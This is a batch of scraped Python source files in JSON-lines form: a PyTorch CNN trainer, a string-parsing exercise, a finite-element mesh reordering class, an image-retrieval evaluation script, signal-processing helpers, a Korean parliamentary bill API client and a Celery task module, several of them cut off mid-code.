+{"seq_id":"183836129","text":"import torch as T\nfrom torch import nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset, DataLoader\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\nfrom torchvision import utils\nfrom tqdm import tqdm\nimport sys\n\ndevice = T.device('cuda') if T.cuda.is_available() else T.device('cpu')\n\ndef make_net(env_w=20, env_h=12, env_p=3):\n width = env_w*env_p\n height = env_h*env_p\n \n cnn = nn.Sequential(\n nn.Conv2d(3, 32, kernel_size=8, stride=4, padding=0),\n nn.ReLU(),\n nn.Conv2d(32, 64, kernel_size=4, stride=2, padding=0),\n nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=0),\n nn.ReLU(),\n nn.Flatten(start_dim=1, end_dim=-1)\n )\n \n test_tensor = T.zeros(1,3,height,width)\n with T.no_grad():\n cnn_out_dim = cnn(test_tensor).size()[-1]\n \n linear = nn.Sequential(\n nn.Linear(cnn_out_dim, 512),\n nn.ReLU()\n )\n \n mapping = nn.Linear(512, 52)\n \n return nn.Sequential(\n cnn,\n linear,\n mapping\n )\n \ndef make_dataloader(dataset, split=.9, batch_size=64, random_split=False):\n dataset_images = T.from_numpy(dataset[\"img\"]).transpose(1,-1)#T.from_numpy(dataset[\"img\"].astype(np.float32)/255.).transpose(1,-1)#.to(device)\n dataset_targets = T.from_numpy(dataset[\"obs\"])#.to(device)\n if random_split:\n split_len = int((1.-split)*len(dataset_images))\n idx = np.random.randint(0, len(dataset_images)-split_len)\n train_dataset = TensorDataset(T.cat((dataset_images[:idx], dataset_images[idx+split_len:])),\n T.cat((dataset_targets[:idx], dataset_targets[idx+split_len:])))\n test_dataset = TensorDataset(dataset_images[idx:idx+split_len], dataset_targets[idx:idx+split_len]) \n else:\n idx = int(split*len(dataset_images))\n train_dataset = TensorDataset(dataset_images[:idx], dataset_targets[:idx])\n test_dataset = TensorDataset(dataset_images[idx:], dataset_targets[idx:]) \n train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n test_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=False)\n return train_dataloader, test_dataloader, len(train_dataset), len(test_dataset)\n \ndef train_model(dataset, epochs, loss_save_loc=\"loss.png\", batch_size=1024, lr=0.0003, random_split=False, verbose=False, net_path=None, env_p=3):\n if net_path:\n net = T.load(net_path).to(device)\n else:\n net = make_net(env_p=env_p).to(device)\n print(\"Net arch:\", net)\n train_loader, test_loader, num_train, num_test = make_dataloader(dataset, batch_size=batch_size, random_split=random_split)\n print(\"Training number of samples:\", num_train, \"| number of batches:\", len(train_loader))\n print(\"Evaluation number of samples:\", num_test, \"| number of batches:\", len(test_loader))\n optimizer = optim.Adam(net.parameters(), lr=lr)\n training_losses = []\n eval_losses = []\n gen = tqdm(range(epochs), file=sys.stdout)\n for e in gen:\n if not epochs // 10 == 0:\n if e % (epochs // 10) == 0:\n print(\"Epoch:\", e, flush=True)\n net.train()\n training_loss = 0.\n for batch_idx, (data, target) in enumerate(train_loader):\n data = (data.float()/255.).to(device)\n target = target.to(device)\n output = net(data)\n loss = F.mse_loss(output, target)\n optimizer.zero_grad()\n loss.backward()\n training_loss += loss.item()\n optimizer.step()\n if verbose:\n print(\"Average loss during training epoch \", e, \": \", training_loss/num_train, sep=\"\")\n training_losses.append(training_loss/num_train)\n net.eval()\n eval_loss = 0.\n for batch_idx, (data, target) in enumerate(test_loader):\n data = (data.float()/255.).to(device)\n target = target.to(device)\n output = net(data)\n eval_loss += F.mse_loss(output, target).item()\n if verbose:\n print(\"Average loss during eval epoch \", e, \": \", eval_loss/num_test, sep=\"\")\n eval_losses.append(eval_loss/num_test)\n gen.refresh()\n plt.title(\"Average loss per epoch\")\n plt.plot(training_losses, label=\"Train\")\n plt.plot(eval_losses, label=\"Eval\")\n plt.ylim(ymin=0, ymax=eval_losses[0]*1.1)\n plt.legend()\n plt.savefig(loss_save_loc)\n return net.cpu()\n \ndef visTensor(tensor, ch=0, allkernels=False, nrow=8, padding=1): \n n,c,w,h = tensor.shape\n\n if allkernels: tensor = tensor.view(n*c, -1, w, h)\n elif c != 3: tensor = tensor[:,ch,:,:].unsqueeze(dim=1)\n\n rows = np.min((tensor.shape[0] // nrow + 1, 64)) \n grid = utils.make_grid(tensor, nrow=nrow, normalize=True, padding=padding)\n plt.figure( figsize=(nrow,rows) )\n plt.imshow(grid.numpy().transpose((1, 2, 0)))\n \ndef visualize_kernels(model, save_loc):\n filter = model[0][0].weight.data.clone().cpu()\n visTensor(filter)\n\n plt.axis('off')\n plt.ioff()\n plt.savefig(save_loc.replace('.', \"_L0.\"))\n\n filter = model[0][2].weight.data.clone().cpu()\n visTensor(filter)\n\n plt.axis('off')\n plt.ioff()\n plt.savefig(save_loc.replace('.', \"_L1.\"))\n\n filter = model[0][4].weight.data.clone().cpu()\n visTensor(filter)\n\n plt.axis('off')\n plt.ioff()\n plt.savefig(save_loc.replace('.', \"_L2.\"))\n \nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"dataset_path\", type=str, help=\"File path of dataset to train on.\")\n parser.add_argument(\"--model_save_loc\", type=str, default=\"model.pth\", help=\"Path to save model to after training.\")\n parser.add_argument(\"--figure_save_loc\", type=str, default=\"loss.png\", help=\"Path to save training/eval loss figure to.\")\n parser.add_argument(\"--num_epochs\", type=int, default=100, help=\"Number of epochs to train for.\")\n parser.add_argument(\"--batch_size\", type=int, default=1024, help=\"Batch size to use during training.\")\n parser.add_argument(\"--learning_rate\", type=float, default=0.0003, help=\"Learning rate to use during training.\")\n parser.add_argument(\"--random_split\", action=\"store_true\", help=\"Indicates that dataset will be randomly split into test/eval (one split only done initially).\")\n parser.add_argument(\"--verbose\", action=\"store_true\", help=\"Verbose output during training.\")\n parser.add_argument(\"--net_path\", type=str, default=None, help=\"(Optional) path to existing model to be trained.\")\n parser.add_argument(\"--env_p\", type=int, default=3, help=\"Value used for image-based environment will draw one in-game grid square as p^2 pixels.\")\n parser.add_argument(\"--weight_viz_loc\", type=str, default=None, help=\"(Optional) path to save weight visualization.\")\n args = parser.parse_args()\n print(args, flush=True)\n \n dataset = np.load(args.dataset_path)\n trained_model = train_model(dataset, args.num_epochs, loss_save_loc=args.figure_save_loc, \n batch_size=args.batch_size, lr=args.learning_rate, random_split=args.random_split, \n verbose=args.verbose, net_path=args.net_path, env_p=args.env_p)\n T.save(trained_model.state_dict(), args.model_save_loc)\n T.save(trained_model[0].state_dict(), args.model_save_loc.replace(\".\", \"_cnn.\"))\n T.save(trained_model[1].state_dict(), args.model_save_loc.replace(\".\", \"_linear.\"))\n \n if args.weight_viz_loc:\n visualize_kernels(trained_model, args.weight_viz_loc)","sub_path":"PythonScripts/nature_cnn_pretrain.py","file_name":"nature_cnn_pretrain.py","file_ext":"py","file_size_in_byte":7637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"204057008","text":"# Write code using find() and string slicing (see section 6.10) to extract the number at the end\n# of the line below. Convert the extracted value to a floating point number and print it out.\n# text = \"X-DSPAM-Confidence: 0.8475\";\n\ntext = input(\"Enter text:\")\ncolon_pos = text.find(\":\")\nstr_num = text[colon_pos + 1:]\nstr_strip = str_num.strip()\ntry:\n float_num = float(str_strip)\nexcept:\n print(\"Error - given input has no numbers or has invalid numbers\")\n exit()\nprint(float_num)\n","sub_path":"Python_Data_Structures/string_assi.py","file_name":"string_assi.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"513234908","text":"import queue\n\nfrom constants import *\n\n\nclass ReorderElementConnectivity:\n def __init__(self):\n logging.basicConfig(level=LOGGER_LEVEL, format=LOGGER_FORMAT)\n self.logger = logging.getLogger(__name__)\n\n self.mesh_data = None\n self.count_reorder_pattern_used = None\n pass\n\n def reorder(self, mesh_data):\n \"\"\"\n 要素内の節点順序の並び替えと、\n 要素へのフラグの設定を行う。\n \"\"\"\n self.logger.info(f'start reorder()')\n\n # num_elements\n self.mesh_data = mesh_data\n num_elements = mesh_data.get_num_elements()\n\n self.count_reorder_pattern_used = [0] * len(ORDERED_NODES)\n\n is_ordered = [False] * num_elements\n queue_elements = queue.LifoQueue()\n\n start_element_index = 0\n queue_elements.put(start_element_index)\n element_flag = [ELEMENT_FLAG_UNDETERMINED] * num_elements\n element_flag[start_element_index] = ELEMENT_FLAG_INITIAL\n\n neighbor_element = mesh_data.get_neighbor_element()\n\n count_reorder_success = 0\n count_reorder_fail = 0\n count_loop = 0\n count_ordered = 0\n while not queue_elements.empty():\n count_loop += 1\n if count_loop > 0 and count_loop % LOGGER_INTERVAL == 0:\n self.logger.info(f'reorder : count_loop={count_loop}, count_ordered={count_ordered}, '\n f'queue_size={queue_elements.qsize()}')\n\n element_index = queue_elements.get()\n if is_ordered[element_index]:\n continue\n else:\n is_ordered[element_index] = True\n count_ordered += 1\n \n for i_face in range(NUM_FACES_OF_ELEMENT):\n neighbor_element_index = neighbor_element[element_index][i_face]\n if neighbor_element_index == INVALID:\n continue\n if not is_ordered[neighbor_element_index]:\n continue\n \n if element_flag[neighbor_element_index] == element_flag[element_index]:\n self.logger.warning(f'error: flag mismatched, element={element_index}, face={i_face}, '\n f'neighbor_element={neighbor_element_index}')\n self.logger.warning(f'error: flag mismatched, element_flag={element_flag}')\n else:\n reorder_success = self.reorder_connectivity(element_index, neighbor_element_index)\n if reorder_success:\n count_reorder_success += 1\n else:\n count_reorder_fail += 1\n break\n\n for i_face in range(NUM_FACES_OF_ELEMENT):\n neighbor_element_index = neighbor_element[element_index][i_face]\n if neighbor_element_index != INVALID and not is_ordered[neighbor_element_index]:\n if element_flag[element_index] == ELEMENT_FLAG_A:\n element_flag[neighbor_element_index] = ELEMENT_FLAG_B\n elif element_flag[element_index] == ELEMENT_FLAG_B:\n element_flag[neighbor_element_index] = ELEMENT_FLAG_A\n queue_elements.put(neighbor_element_index)\n\n mesh_data.set_element_flag(element_flag)\n\n self.check_after_reorder()\n\n self.logger.info(f'count_reorder_pattern_used={self.count_reorder_pattern_used}')\n self.logger.info(f'reorder count : success={count_reorder_success}, fail={count_reorder_fail}')\n\n self.logger.info(f'finish reorder()')\n pass\n\n def reorder_connectivity(self, element_index_1, element_index_2):\n \"\"\"\n 1つの要素の節点順序の並び替えを行う。\n element_index_1が並び替え対象の要素であり、\n element_index_2は、並び替えの基準とする要素である。\n \"\"\"\n mesh_data = self.mesh_data\n elements_df = mesh_data.get_elements_df()\n neighbor_element = mesh_data.get_neighbor_element()\n neighbor_face = mesh_data.get_neighbor_face()\n\n nodes = [elements_df[COLUMN_NODE_0].values, elements_df[COLUMN_NODE_1].values, elements_df[COLUMN_NODE_2].values,\n elements_df[COLUMN_NODE_3].values, elements_df[COLUMN_NODE_4].values, elements_df[COLUMN_NODE_5].values,\n elements_df[COLUMN_NODE_6].values, elements_df[COLUMN_NODE_7]]\n\n nodes_1_before = [\n nodes[0][element_index_1],\n nodes[1][element_index_1],\n nodes[2][element_index_1],\n nodes[3][element_index_1],\n nodes[4][element_index_1],\n nodes[5][element_index_1],\n nodes[6][element_index_1],\n nodes[7][element_index_1]\n ]\n\n neighbor_element_1 = neighbor_element[element_index_1]\n neighbor_element_2 = neighbor_element[element_index_2]\n neighbor_face_1 = neighbor_face[element_index_1]\n neighbor_face_2 = neighbor_face[element_index_2]\n\n face_1 = INVALID\n face_2 = INVALID\n flag_hit_1 = False\n flag_hit_2 = False\n for face_1 in range(NUM_FACES_OF_ELEMENT):\n if element_index_2 == neighbor_element_1[face_1]:\n flag_hit_1 = True\n break\n\n for face_2 in range(NUM_FACES_OF_ELEMENT):\n if element_index_1 == neighbor_element_2[face_2]:\n flag_hit_2 = True\n break\n \n if not flag_hit_1 or not flag_hit_2:\n self.logger.info(f'not neighbor element element_1={element_index_1}, element_2={element_index_2}')\n return False\n\n if neighbor_face_1[face_1] != face_2:\n self.logger.info(f'#a face id mismatch : element_1={element_index_1}, face_1={face_1}, '\n f'element_2={element_index_2}, face_2={face_2}')\n if neighbor_face_2[face_2] != face_1:\n self.logger.info(f'#b face id mismatch : element_1={element_index_1}, face_1={face_1}, '\n f'element_2={element_index_2}, face_2={face_2}')\n\n face_1_correct = FACE_RELATION_ARRAY[face_2]\n\n temp_local_nodes_1 = NODES_OF_FACE[face_1_correct]\n local_node_1_0_temp = temp_local_nodes_1[0]\n local_node_1_1_temp = temp_local_nodes_1[1]\n local_node_1_2_temp = temp_local_nodes_1[2]\n local_node_1_3_temp = temp_local_nodes_1[3]\n\n temp_local_nodes_2 = NODES_OF_FACE_REVERSE[face_2]\n local_node_2_0 = temp_local_nodes_2[0]\n local_node_2_1 = temp_local_nodes_2[1]\n local_node_2_2 = temp_local_nodes_2[2]\n local_node_2_3 = temp_local_nodes_2[3]\n p_2_0 = nodes[local_node_2_0][element_index_2]\n p_2_1 = nodes[local_node_2_1][element_index_2]\n p_2_2 = nodes[local_node_2_2][element_index_2]\n p_2_3 = nodes[local_node_2_3][element_index_2]\n list_2 = [p_2_0, p_2_1, p_2_2, p_2_3]\n\n reorder_pattern_id = INVALID\n flg_reordered = False\n for reorder_pattern_id in range(len(ORDERED_NODES)):\n ordered_nodes = ORDERED_NODES[reorder_pattern_id]\n # after reorder\n local_node_1_0 = ordered_nodes[local_node_1_0_temp]\n local_node_1_1 = ordered_nodes[local_node_1_1_temp]\n local_node_1_2 = ordered_nodes[local_node_1_2_temp]\n local_node_1_3 = ordered_nodes[local_node_1_3_temp]\n # local to global\n p_1_0 = nodes_1_before[local_node_1_0]\n p_1_1 = nodes_1_before[local_node_1_1]\n p_1_2 = nodes_1_before[local_node_1_2]\n p_1_3 = nodes_1_before[local_node_1_3]\n list_1 = [p_1_0, p_1_1, p_1_2, p_1_3]\n\n # self.logger.info(f'list1={list_1}, list2={list_2}')\n if list_1 == list_2:\n flg_reordered = True\n break\n\n if not flg_reordered:\n self.logger.info(f'reorder failed, '\n f'element_1={element_index_1}, face_1={face_1}, '\n f'element_2={element_index_2}, face_2={face_2}')\n return False\n\n self.count_reorder_pattern_used[reorder_pattern_id] += 1\n\n # self.logger.info(f'reorder_pattern_id={reorder_pattern_id}, '\n # f'element_1={element_index_1}, element_2={element_index_2}')\n\n neighbor_element_before = [neighbor_element_1[i] for i in range(NUM_FACES_OF_ELEMENT)]\n neighbor_face_before = [neighbor_face_1[i] for i in range(NUM_FACES_OF_ELEMENT)]\n for i_face_new in range(NUM_FACES_OF_ELEMENT):\n face_old = ORDERED_FACE_NUMBER[reorder_pattern_id][i_face_new]\n \n neighbor_element_index = neighbor_element_before[face_old]\n neighbor_face_index = neighbor_face_before[face_old]\n neighbor_element_1[i_face_new] = neighbor_element_index\n neighbor_face_1[i_face_new] = neighbor_face_index\n\n if neighbor_element_index != INVALID and neighbor_face_index != INVALID:\n if neighbor_face[neighbor_element_index][neighbor_face_index] != face_old:\n self.logger.warning(f'error : face mismatch : '\n f'reorder_pattern_id={reorder_pattern_id}, '\n f'element_1={element_index_1}, element_2={element_index_2}')\n neighbor_face[neighbor_element_index][neighbor_face_index] = i_face_new\n\n for local_node_id in range(NUM_NODES_OF_ELEMENT):\n local_node_id_new = ORDERED_NODES[reorder_pattern_id][local_node_id]\n nodes[local_node_id][element_index_1] = nodes_1_before[local_node_id_new]\n\n return True\n\n def check_after_reorder(self):\n self.logger.info(f'start check_after_reorder()')\n\n mesh_data = self.mesh_data\n num_elements = mesh_data.get_num_elements()\n elements_df = mesh_data.get_elements_df()\n neighbor_element = mesh_data.get_neighbor_element()\n neighbor_face = mesh_data.get_neighbor_face()\n element_flag = mesh_data.get_element_flag()\n\n flag_error_found = False\n for i_element in range(num_elements):\n element_flag_current = element_flag[i_element]\n if element_flag_current != ELEMENT_FLAG_A and element_flag_current != ELEMENT_FLAG_B:\n flag_error_found = True\n self.logger.warninig(f'error : unknown element flag : '\n f'element={i_element}, '\n f'element_flag={element_flag_current}')\n\n for i_face in range(NUM_FACES_OF_ELEMENT):\n neighbor_element_index = neighbor_element[i_element][i_face]\n neighbor_face_index = neighbor_face[i_element][i_face]\n\n if neighbor_element_index == INVALID and neighbor_face_index == INVALID:\n pass\n elif neighbor_element_index == INVALID or neighbor_face_index == INVALID:\n flag_error_found = True\n self.logger.warninig(f'error : INVALID found : '\n f'element={i_element}, face={i_face}, '\n f'neighbor_element={neighbor_element_index}, '\n f'neighbor_face={neighbor_face_index}')\n else:\n element_flag_neighbor = element_flag[neighbor_element_index]\n if element_flag_neighbor != ELEMENT_FLAG_A and element_flag_neighbor != ELEMENT_FLAG_B:\n flag_error_found = True\n self.logger.warninig(f'error : unknown element flag : '\n f'neighbor_element={neighbor_element_index}, '\n f'neighbor_element_flag={element_flag_neighbor}')\n\n if element_flag_current == element_flag_neighbor:\n flag_error_found = True\n self.logger.warninig(f'error : same element flag contact: '\n f'element={i_element}, face={i_face}, '\n f'element_flag={element_flag_current}, '\n f'neighbor_element={neighbor_element_index}, '\n f'neighbor_face={neighbor_face_index}, '\n f'neighbor_element_flag={element_flag_neighbor}')\n\n if neighbor_face_index != FACE_RELATION_ARRAY[i_face]:\n flag_error_found = True\n self.logger.warninig(f'error : face mismatch: element={i_element}, face={i_face}, '\n f'neighbor_element_index={neighbor_element_index}, '\n f'neighbor_face_index={neighbor_face_index}')\n\n if not flag_error_found:\n self.logger.info(f'no error found')\n\n self.logger.info(f'finish check_after_reorder()')\n pass\n\n","sub_path":"meshconverter/src/reorder_element_connectivity.py","file_name":"reorder_element_connectivity.py","file_ext":"py","file_size_in_byte":13189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"222009830","text":"from sys import path\npath.append(\"../QIK_Web/util/\")\n\nimport constants\nimport logging\nimport delf_search\nimport datetime\n\n# Local constants\nEVAL_K = 16\nIN_FILE = \"data/MSCOCO_Subset_2/MSCOCO_Subset_2.txt\"\nOUT_FILE = \"data/MSCOCO_Subset_2/DELF_Pre_Results_Dict.txt\"\n\ndef retrieve(query_image):\n ret_dict = {}\n\n # Reading the input request.\n query_image_path = constants.TOMCAT_LOC + constants.IMAGE_DATA_DIR + query_image\n\n # Get DELF results\n time = datetime.datetime.now()\n\n delf_results = []\n\n # Fetching the candidates from DELF.\n delf_pre_results = delf_search.delf_search(query_image_path, EVAL_K + 1)\n\n # Noting DELF time.\n delf_time = datetime.datetime.now() - time\n print(\"QIK Server :: DELF Fetch Execution time :: \", delf_time)\n logging.info(\"QIK Server :: DELF Fetch Execution time :: %s\", str(delf_time))\n\n # Removing query image from the result set.\n for res in delf_pre_results:\n img_file = res.rstrip().split(\"/\")[-1]\n if img_file == query_image:\n continue\n delf_results.append(res.rstrip().split(\"/\")[-1])\n print(\"QIK Server :: DELF :: delf_results :: \", delf_results)\n\n # Adding data to the return dictionary.\n ret_dict[\"delf_time\"] = delf_time.microseconds\n ret_dict[\"delf_results\"] = delf_results\n\n # Writing the output to a file.\n with open(OUT_FILE, 'a+') as f:\n f.write(query_image + \":: \" + str(ret_dict) + \"\\n\")\n\n print(\"qik_pre_eval :: retrieve :: ret_dict :: \", str(ret_dict))\n return ret_dict\n\nif __name__ == '__main__':\n # Setting log level\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n logging.basicConfig(filename=\"QIK_PreEval_Server.log\", level=logging.INFO)\n\n # Initializing the ML Models.\n delf_search.init()\n\n # Reading the images from the file.\n images = open(IN_FILE, \"r\")\n for image in images:\n print(\"qik_pre_eval :: Executing :: \", image)\n retrieve(image.rstrip())","sub_path":"QIK_Evaluation/delf_pre_eval.py","file_name":"delf_pre_eval.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"114810642","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport plotting as P\n\n##In order to import this toolbox into a python script you need to \n##do the following. Copy the following lines of code below\n# import sys\n# sys.path.append('/home/carlos/Dropbox/BlackBox/math')\n# from math import *\n\n# or\n# In order to get python to search for all of your lovely blackbox \n# python routines. Add this to your .bashrc file\n\n# for d in /home/carlos/Dropbox/BlackBox/*/; do\n# \tPYTHONPATH+=:$d\n# done\n# export PYTHONPATH\n\n# In order to get this to work in Thonny you need to navigate to\n# /home/user/.thonny/BundledPython36/lib/python3.6/site-packages and place\n# a symbolic link here\n\n# In Enthough you need to make symbolic links here\n# /home/carlos/.local/share/canopy/edm/envs/User/lib/python2.7/site-packages\n\ndef string2binary(text):\n dec = \" \".join(str(ord(char)) for char in text).split(\" \")\n print(dec)\n return \" \".join(bin(int(b)) for b in dec)\n\ndef interpolateNans(inX):\n outX = []\n x_new = 0\n for x in inX:\n if not np.isnan(x):\n x_new = x\n outX.append(x_new)\n\n return np.asarray(outX)\n\ndef averages(time,input_stream,avg):\n ##Assume input string is in hrs :(\n ##But avg is in minutes :(\n time_avg = []\n data_avg = []\n t0 = time[0]\n numData = 0.0\n cur_avg = 0.0\n ctr = -1\n for t in time:\n #print t,cur_avg,numData\n ctr+=1\n if t > t0 + avg/60.0:\n ##Append avg\n data_avg.append(cur_avg/numData)\n time_avg.append(t0+avg/60.0)\n ##Reset t0,cur_avg and numData\n t0 = t\n cur_avg = 0.0\n numData = 0.0\n else:\n ##Increment numData and rolling average\n numData+=1.0\n cur_avg+= input_stream[ctr]\n\n #Get Last Data point\n time_avg.append(t0+avg/60.0)\n data_avg.append(cur_avg/numData)\n\n return [np.array(time_avg),np.array(data_avg)]\n\ndef sec(x):\n return 1/np.cos(x)\n\ndef psiwrap(xc,yc,x,y,psi):\n psic = np.arctan2(yc-y,xc-x)\n delpsi = -np.arctan2(np.sin(psi)*np.cos(psic)-np.cos(psi)*np.sin(psic),np.cos(psi)*np.cos(psic)+np.sin(psi)*np.sin(psic));\n return delpsi\n\ndef unwrap_simple(inX):\n outX = []\n for x in inX:\n if x > 180:\n x -= 360\n outX.append(x)\n return outX\n\ndef unwrap_complex(inX):\n outX = []\n for idx in range(1,len(inX)):\n if abs(inX[idx]-inX[idx-1]) > 180:\n inX[idx] = inX[idx] - 360\n return inX\n\ndef unwrap(inX,lower_threshold=0):\n #this will fix timer issues that accidentally reset or it will fix issues with heading wrapping around\n #+-360.\n outX = []\n offset = 0\n for x in inX:\n #make sure you've looped through once\n if len(outX) > 0:\n #Assume the function is monotonically increasing\n if x+offset < outX[-1]:\n offset = outX[-1] - x\n outX.append(x+offset)\n\n return outX\n \ndef Reimmann(x,t):\n out = 0\n for i in range(1,len(t)):\n out += x[i]*(t[i]-t[i-1])\n return out \n\ndef fft(f,t,nmax,iplot,pp=None):\n N = len(t)\n tfft = np.linspace(t[0],t[-1],N)\n ffft = np.zeros([len(tfft)])\n if iplot:\n plt.figure()\n plt.plot(t,f,'b-',label='Original Waveform')\n if nmax < 1:\n nmax = 2\n iters = np.arange(1,nmax+1,1)\n an = np.zeros([len(iters)])\n bn = np.zeros([len(iters)])\n L = t[-1]\n d = (1.0/L)*Reimmann(f,t)\n for i in range(0,len(iters)):\n print('FFT frequency = ' + str(i) + ' out of ' + str(len(iters)))\n n = iters[i]\n #Frequency\n w = 2.0*n*np.pi/L\n print('Frequency (Hz) = ' + str(i/L))\n data_a = np.cos(w*tfft)\n data_b = np.sin(w*tfft)\n #Reimann Sum\n ani = (2.0/L)*Reimmann(data_a*f,t)\n bni = (2.0/L)*Reimmann(data_b*f,t)\n #Save Coefficients\n an[i] = ani\n bn[i] = bni\n #Recreate Waveform\n ffft += ani*data_a + bni*data_b\n if iplot == 2:\n plt.plot(t,f,'b-',label='Original Waveform')\n plt.plot(tfft,ffft,'r--',label='Recreated Waveform')\n plt.pause(0.001)\n plt.cla()\n ffft += d\n frequencies = iters/L\n if iplot:\n plt.plot(tfft,ffft,'r--',label='Recreated Waveform')\n plt.grid()\n plt.legend()\n if pp is not None:\n pp.savefig()\n plt.figure()\n plt.scatter(frequencies,abs(an),color='b',marker='s',label='An')\n plt.scatter(frequencies,abs(bn),color='r',marker='*',label='Bn')\n plt.legend()\n plt.grid()\n plt.xlabel('Frequencies (Hz)')\n plt.ylabel('Magnitude')\n if pp is not None:\n pp.savefig()\n return d,an,bn,iters,frequencies\n\ndef Complimentary(sigma,inX):\n outX = np.zeros(len(inX))\n outX[0] = inX[0]\n for idx in range(0,len(inX)-1):\n outX[idx+1] = (1-sigma)*outX[idx] + sigma*inX[idx]\n \n return outX\n\ndef Moving_Average(num,inX):\n outX = np.zeros(len(inX))\n window = np.zeros(num)\n ctr = 0\n START_AVERAGING = 0\n for idx in range(0,len(inX)):\n window[ctr] = inX[idx]\n ctr+=1\n if ctr >= num:\n ctr = 0\n START_AVERAGING = 1\n if START_AVERAGING:\n s = np.sum(window)\n avg = s/num\n outX[idx] = avg\n return outX\n\ndef LowPass(inY,inX,a):\n dt = inX[1]-inX[0]\n #print(\"Timestep = \",dt)\n tau = 1.0/a\n #print(\"Tau = \",tau)\n alfa = 2*tau/dt\n #print(\"Alfa = \",alfa)\n outY = np.zeros(len(inY))\n outY[0] = inY[0]\n outX = np.zeros(len(inX))\n outX[0] = inX[0]\n for x in range(0,len(inX)-1):\n outY[x+1] = (inY[x+1]+inY[x]-outY[x]*(1-alfa))/(alfa+1)\n outX[x+1] = (inX[x+1]+inX[x]-outX[x]*(1-alfa))/(alfa+1)\n\n return [outY,outX]\n\ndef Derivative(inY,inX,threshold):\n deriv = np.copy(inY)*0\n last_non_zero = 0.0\n for j in range(0,len(inX)-2):\n deriv[j] = (-inY[j+2]+4*inY[j+1]-3*inY[j])/(2*(inX[j]-inX[j-1]))\n if abs(deriv[j]) > threshold:\n deriv[j] = last_non_zero\n else:\n if abs(deriv[j]) > 0.0:\n last_non_zero = deriv[j]\n\n xyout = [deriv,inX]\n \n return xyout\n\n# Copyright - Carlos Montalvo 2016\n# You may freely distribute this file but please keep my name in here\n# as the original owner\n","sub_path":"mymath/mymath.py","file_name":"mymath.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"543789122","text":"import xml.etree.ElementTree as ET\nimport urllib.request\nimport time\nimport mysql\n\nURL = 'http://apis.data.go.kr/9710000/BillInfoService/getBillInfoList'\nSERVICE_KEY = '&ServiceKey=ACeHLDbQGARcstF1upsWKu0Smqm7vo%2FNai%2BOze\\\nYzMQtFivEmw0Wh6fgnLZhKMybSEE4ZvJHiLcfZHQYwF7HsSQ%3D%3D'\n\ndef bill_list(all_bills, politician_id, name, num_of_rows, is_representative):\n values = {\n 'numOfRows': num_of_rows,\n 'gbn': 'dae_num_name',\n 'mem_name': name,\n 'mem_name_check': is_representative,\n 'ord': 'A01',\n 'start_ord': 20,\n 'end_ord': 20,\n 'proposer_kind_cd': 'F01',\n }\n\n # for _ in range(1):\n data = urllib.parse.urlencode(values)\n full_url = URL + '?' + data + SERVICE_KEY\n # print(politician_id, full_url)\n\n # try:\n tree = ET.ElementTree(file=urllib.request.urlopen(full_url))\n root = tree.getroot()\n\n items = root.find('body').find('items')\n\n for item in items:\n bill = {}\n","sub_path":"politician_api.py","file_name":"politician_api.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"132770232","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\n\nfrom celery import Celery,platforms\nfrom kombu import Exchange, Queue\nfrom celery import task\nfrom config import *\nimport json\nimport uuid\nimport datetime\nimport time\n\nONCE_CAPACITY = 1\n\napp = Celery(\"srjob.reward\", broker=amqp_url)\n\n\nplatforms.C_FORCE_ROOT = True\n\napp.conf.update(\n CELERY_TRACK_STARTED=True,\n CELERY_TASK_SERIALIZER='json',\n CELERY_ACCEPT_CONTENT=['json'], # Ignore other content\n CELERY_RESULT_SERIALIZER='json',\n CELERY_IMPORTS = (\"addsendapp\",\"preparesendapp\",\"dosendapp\",\"addJob\",\"addsendmail\",\"addsendmsg\",\"addsendsms\",\"addtask\",\"custinfosync\",\"custsync\",\"doreward\",\"dosendmail\",\"dosendmsg\",\"dosendsms\",\"findJob\",\"preparereward\",\"preparesendmail\",\"preparesendmsg\",\"preparesendsms\",\"sessionclose\",\"tagsync\",\"tasks\",\"usercheck\",)\n)\n\ndiff_time = time.timezone\ndef utc_now():\n return datetime.datetime.now() + datetime.timedelta(seconds=diff_time)\n\n@app.task(name=\"srjob.reward.addreward\")\ndef addreward(reward):\n redisdb = ensure_redis()\n\n task = json.loads(reward)\n if \"esttime\" in task.keys():\n esttime = task[\"esttime\"]\n if \"pointnum\" in task.keys():\n pointnum = task[\"pointnum\"]\n if \"sendtype\" in task.keys():\n sendtype = task[\"sendtype\"]\n if \"couponid\" in task.keys():\n couponid = task[\"couponid\"]\n if \"pointexdate\" in task.keys():\n pointexdate = task[\"pointexdate\"]\n if \"taskid\" in task.keys():\n task_id = task[\"taskid\"]\n if \"campaignid\" in task.keys():\n campaignid = task[\"campaignid\"]\n\n redisdb.hmset(\"reward:\"+str(task_id),{\n \"_id\": task_id,\n \"task\": \"reward\",\n \"arguments\": _decode_dict(task),\n \"campaignid\":campaignid,\n \"esttime\":esttime,\n \"creat_time\": utc_now(),\n \"isenable\":1,#1可用 0不可用\n \"prepare\":0,#1数据已准备 0数据未准备\n \"status\": \"STARTED\"\n })\n redisdb.rpush(\"reward\",\"reward:\"+str(task_id))\n\ndef _decode_dict(data):\n rv = {}\n for key, value in data.iteritems():\n if isinstance(key, unicode):\n key = key.encode('utf-8')\n if isinstance(value, unicode):\n value = value.encode('utf-8')\n elif isinstance(value, list):\n value = 